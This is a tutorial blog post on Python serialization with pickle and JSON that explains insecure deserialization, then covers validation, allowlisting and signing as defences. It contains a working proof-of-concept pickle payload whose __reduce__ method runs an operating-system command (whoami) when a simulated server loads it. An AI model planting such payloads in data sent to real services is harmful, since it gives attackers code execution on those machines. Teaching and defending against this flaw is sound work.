Insecure Deserialization — Why it is a vulnerability


Nanak Singh Khurana

Before looking at deserialization, let us first understand what serialization is.

Serialization: It is the process of converting data from complex data structures into a byte stream, which can then be stored or sent and received as a sequential stream of bytes.

A natural question here: can't we just use a plain text format of key-value pairs, such as JSON, instead of a binary byte stream?

The answer is yes, we can.

But a binary byte stream has its own advantages:

1. Compact Representation: Binary formats are generally more compact than text-based formats like JSON. This can reduce storage requirements and improve performance when reading and writing data.

2. Speed: Binary serialization can be faster than text-based serialization, both in terms of serialization/deserialization speed and I/O operations as they avoid the overhead of encoding and decoding textual representations.

3. Precision: Binary formats can preserve the exact structure and type information of the serialized objects, ensuring that deserialized objects are reconstructed accurately.

4. Complex Data Structures: Binary formats can handle more complex data structures and object graphs, including references and circular dependencies, which can be challenging to represent efficiently in text-based formats.

5. Reduced Exposure: Text-based formats are easier to read and manipulate, which may expose more information to potential attackers. Binary formats obscure the data representation, making it harder to understand and tamper with at a glance, although obscurity alone does not make the data secure.
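Two of the points above (compactness and circular references) can be checked with a small sketch. The data below is made up for illustration, and struct is used here as one example of a fixed-width binary encoding; it is not the only way to produce a binary format.

```python
import json
import pickle
import struct

# 1000 large integers, each needing 10 decimal digits when written as text.
numbers = [1_000_000_000 + i for i in range(1000)]

# Text form: digits plus ", " separators and the surrounding brackets.
as_json = json.dumps(numbers).encode("utf-8")

# Fixed-width binary form: 4 bytes per unsigned 32-bit integer.
as_binary = struct.pack("<1000I", *numbers)

print(len(as_json), len(as_binary))  # 12000 4000

# A list that contains itself (a circular reference).
loop = []
loop.append(loop)

# pickle keeps track of objects it has already seen, so the cycle survives.
restored = pickle.loads(pickle.dumps(loop))
print(restored[0] is restored)  # True

# json refuses to encode the same structure.
try:
    json.dumps(loop)
    json_handles_cycle = True
except ValueError:
    json_handles_cycle = False
print(json_handles_cycle)  # False
```

The size advantage depends on the data. For very small inputs the framing overhead of a binary format can make it larger than the text form: a short list such as [1, 2, 3, 4, 5] takes 15 characters as JSON but 26 bytes as a protocol 4 pickle.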

Example of Serialization of data in Python:

Note: We will use Python's pickle library.

# Importing the pickle module, which is used for serializing and deserializing Python objects.
import pickle
# Create a list object
data_list = [1, 2, 3, 4, 5] # Define a list containing some integer elements.

# Serialize the list to a binary format
serialized_list = pickle.dumps(data_list)
# The 'pickle.dumps' function converts the 'data_list' object into a byte stream (binary format).
# This process is called serialization. The resulting byte stream can be stored or transmitted.

print("Serialized List:", serialized_list)
# Print the serialized byte stream. It will look like a sequence of bytes, which is not human-readable.

# Save the serialized list to a file
with open('list.pkl', 'wb') as file:
    # Open a file named 'list.pkl' in write-binary mode ('wb').
    # The 'with' statement ensures that the file is properly closed after writing.
    # Write the serialized byte stream to the file.
    # This stores the serialized data on disk, allowing it to be retrieved and deserialized later.
    file.write(serialized_list)

I have added comments in the code to explain each line.

This gives the below output:

Serialized List: b'\x80\x04\x95\x0f\x00\x00\x00\x00\x00\x00\x00]\x94(K\x01K\x02K\x03K\x04K\x05e.'

Here we serialized the list into bytes.

Can we do the same with JSON? Yes.
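The byte stream is not human-readable, but the standard library's pickletools module can take it apart without executing it. The sketch below pins protocol=4 (an assumption made here so the opcode sequence does not depend on the interpreter's default protocol).

```python
import pickle
import pickletools

data_list = [1, 2, 3, 4, 5]

# Pin the protocol so the result does not vary with the Python version's default.
serialized_list = pickle.dumps(data_list, protocol=4)

# genops() parses the stream into (opcode, argument, position) triples.
# It only reads the bytes; nothing is reconstructed or executed.
opcode_names = [opcode.name for opcode, arg, pos in pickletools.genops(serialized_list)]
print(opcode_names)

# dis() prints a human-readable disassembly of the same stream.
pickletools.dis(serialized_list)
```

Each of the five integers appears as a BININT1 opcode, which corresponds to the K\x01 ... K\x05 pairs visible in the raw bytes.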

import json
import pickle

# Step 1: Create a Python object (dictionary)
data_dict = {
    "name": "Nanak Singh",
    "age": 23,
    "city": "Delhi"
}

# Step 2: Convert the Python object to a JSON string
json_string = json.dumps(data_dict)
print("JSON String:", json_string)

# Step 3: Serialize the JSON string to a byte stream
byte_stream = pickle.dumps(json_string)
print("Serialized Byte Stream:", byte_stream)

The output of the above code is:

JSON String: {"name": "Nanak Singh", "age": 23, "city": "Delhi"}
Serialized Byte Stream: b'\x80\x04\x957\x00\x00\x00\x00\x00\x00\x00\x8c3{"name": "Nanak Singh", "age": 23, "city": "Delhi"}\x94.'

Now let us understand what deserialization is:

It is the process of converting serialized data back into its original structure or format (in the examples above, getting the JSON data or the list back). When data is serialized, it is transformed into a format that can be easily stored or transmitted, such as a byte stream or a string. Deserialization reverses this process, taking the serialized data and reconstructing it into a usable object or data structure within a program.

Continuing the JSON example above, let us add a deserialization step to it:

import json
import pickle

# Step 1: Create a Python object (dictionary)
data_dict = {
    "name": "Nanak Singh",
    "age": 23,
    "city": "Delhi"
}

# Step 2: Convert the Python object to a JSON string
json_string = json.dumps(data_dict)
print("JSON String:", json_string)

# Step 3: Serialize the JSON string to a byte stream
byte_stream = pickle.dumps(json_string)
print("Serialized Byte Stream:", byte_stream)

# Deserialization

# Step 4: Deserialize the byte stream back to a JSON string
deserialized_json_string = pickle.loads(byte_stream)
print("Deserialized JSON String:", deserialized_json_string)

# Step 5: Convert the JSON string back to a Python object
deserialized_data_dict = json.loads(deserialized_json_string)
print("Deserialized Data Dictionary:", deserialized_data_dict)

This gives the following output:

JSON String: {"name": "Nanak Singh", "age": 23, "city": "Delhi"}
Serialized Byte Stream: b'\x80\x04\x957\x00\x00\x00\x00\x00\x00\x00\x8c3{"name": "Nanak Singh", "age": 23, "city": "Delhi"}\x94.'
Deserialized JSON String: {"name": "Nanak Singh", "age": 23, "city": "Delhi"}
Deserialized Data Dictionary: {'name': 'Nanak Singh', 'age': 23, 'city': 'Delhi'}
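The example above wraps the JSON string in pickle to get a byte stream. A JSON string can also be turned into bytes directly by encoding it, which keeps pickle out of the round trip entirely. A minimal sketch, assuming UTF-8 as the encoding:

```python
import json

data_dict = {"name": "Nanak Singh", "age": 23, "city": "Delhi"}

# Serialize: Python dict -> JSON text -> UTF-8 bytes.
byte_stream = json.dumps(data_dict).encode("utf-8")
print("Byte Stream:", byte_stream)

# Deserialize: UTF-8 bytes -> JSON text -> Python dict.
restored_dict = json.loads(byte_stream.decode("utf-8"))
print("Restored Dictionary:", restored_dict)
```

json.loads() only ever produces basic types (dicts, lists, strings, numbers, booleans and None), which matters for the security discussion that follows.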

So far the process looks fine. Now let us understand what Insecure Deserialization is:

It is a vulnerability that arises when an application deserializes untrusted data without proper validation or sanitization.

What could happen is that attackers inject hostile serialized objects into an application, and the victim's machine then deserializes the hostile data. Attackers could then change the angle of attack, making insecure deserialization the initial entry point to a victim's computer.

Let me take an example to explain this:

Step 1: Creating malicious payload

import pickle
import os

# Define a class with a malicious payload
class Malicious:
    def __reduce__(self):
        # The command to be executed when the payload is deserialized
        cmd = "whoami"
        return (os.system, (cmd,))

# Create an instance of the malicious class
malicious_object = Malicious()

# Serialize the malicious object
malicious_payload = pickle.dumps(malicious_object)

# Save the payload to a file (simulating sending it to the server)
with open('malicious_payload.pkl', 'wb') as f:
    f.write(malicious_payload)

Step 2: Deserializing the Malicious Payload (Simulating the Server)

import pickle

# Read the malicious payload from the file (simulating receiving it from a client)
with open('malicious_payload.pkl', 'rb') as f:
    received_payload = f.read()

# Insecurely deserialize the payload
# This will execute the malicious code (running whoami)
deserialized_object = pickle.loads(received_payload)

When this runs on the server, the whoami command executes and my user ID is printed on the terminal.

Now let us understand what happened above:

1. We defined a class named Malicious with a method named __reduce__. The __reduce__ method returns a tuple with two elements. The first element is a callable (in this case, os.system). The second element is a tuple containing the arguments to be passed to the callable (("whoami",)). This command prints the current user when executed.

2. Then we created malicious_object, which is an instance of the Malicious class.

3. Serializing the Malicious Object:

The instance is serialized using pickle.dumps(), which converts the object into a byte stream that can be saved or transmitted. The serialized byte stream (payload) is saved to a file named malicious_payload.pkl.

That completes Step 1. Now for Step 2:

1. The malicious payload is read from the file malicious_payload.pkl into a variable named received_payload. This simulates receiving the payload from an untrusted source (e.g., a client).

2. The pickle.loads() function is used to deserialize the payload. It does not rebuild a Malicious object; instead, it calls the callable that __reduce__ returned (os.system) with the stored argument ("whoami").

3. As a result, the whoami command is executed during deserialization and prints the current user to the console. An attacker could just as easily chain more commands, for example pwd; whoami to also print the current working directory.

And then boom, the command ran and my terminal showed my user ID.
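One detail worth checking is what pickle.loads() actually hands back for a payload like this. The sketch below uses a hypothetical Harmless class with the same __reduce__ shape, but swaps os.system for the built-in len() so that nothing dangerous runs.

```python
import pickle

class Harmless:
    """Hypothetical stand-in for the Malicious class, using a safe callable."""

    def __reduce__(self):
        # Same shape as the attack: (callable, tuple of arguments).
        # len() stands in for os.system here.
        return (len, ("whoami",))

payload = pickle.dumps(Harmless())

# During loading, pickle calls len("whoami") and returns the result.
result = pickle.loads(payload)

print(result)                        # 6
print(isinstance(result, Harmless))  # False
```

The loaded value is whatever the callable returned, not an instance of the class. With os.system in place of len(), the command would run on the machine doing the loading and the result would be its exit status.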

Now, how do we prevent this?

1. Validate and Sanitize Input: Ensure that the data is validated before it is deserialized. With pickle, the payload runs during loading, so any check has to happen first, for example by verifying that the data really comes from a trusted source.

2. Use Whitelisting: If deserialization is necessary, implement whitelisting (an allowlist) to restrict which classes or types can be deserialized.
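Both measures can be sketched with the standard library. The allowlist part follows the pattern of overriding Unpickler.find_class; the names ALLOWED_GLOBALS, restricted_loads, sign, verified_loads and SECRET_KEY are hypothetical, chosen for this illustration, and the HMAC check is one possible way to confirm the bytes come from a party that holds the shared key.

```python
import hashlib
import hmac
import io
import os
import pickle

# Hypothetical allowlist: only these (module, name) pairs may be resolved.
ALLOWED_GLOBALS = {("builtins", "set"), ("builtins", "frozenset")}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the stream asks for a global such as os.system.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is not allowed")

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

# Hypothetical shared secret; a real one must come from secure configuration.
SECRET_KEY = b"replace-with-a-real-secret"

def sign(data: bytes) -> bytes:
    return hmac.new(SECRET_KEY, data, hashlib.sha256).digest()

def verified_loads(data: bytes, signature: bytes):
    # Check the signature BEFORE touching the pickle data.
    if not hmac.compare_digest(sign(data), signature):
        raise ValueError("signature mismatch, refusing to deserialize")
    return restricted_loads(data)

class Malicious:
    def __reduce__(self):
        return (os.system, ("whoami",))

# Plain containers and numbers need no globals, so they load normally.
safe_bytes = pickle.dumps([1, 2, 3])
print(verified_loads(safe_bytes, sign(safe_bytes)))

# The malicious payload is rejected before os.system is ever called.
bad_bytes = pickle.dumps(Malicious())
try:
    restricted_loads(bad_bytes)
    blocked = False
except pickle.UnpicklingError as exc:
    blocked = True
    print("Blocked:", exc)
```

Neither measure makes pickle safe for arbitrary input. When the data only consists of basic types, a format such as JSON avoids the problem, since loading it never calls code chosen by the sender.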

For more advanced serialization practices, Karthikeyan Nagaraj has written a great post: https://cyberw1ng.medium.com/serialization-and-deserialization-advanced-concepts-and-best-practices-c6562fce9e4b

Thanks for reading!!!

Let's connect: https://www.linkedin.com/in/nanak-singh-khurana/
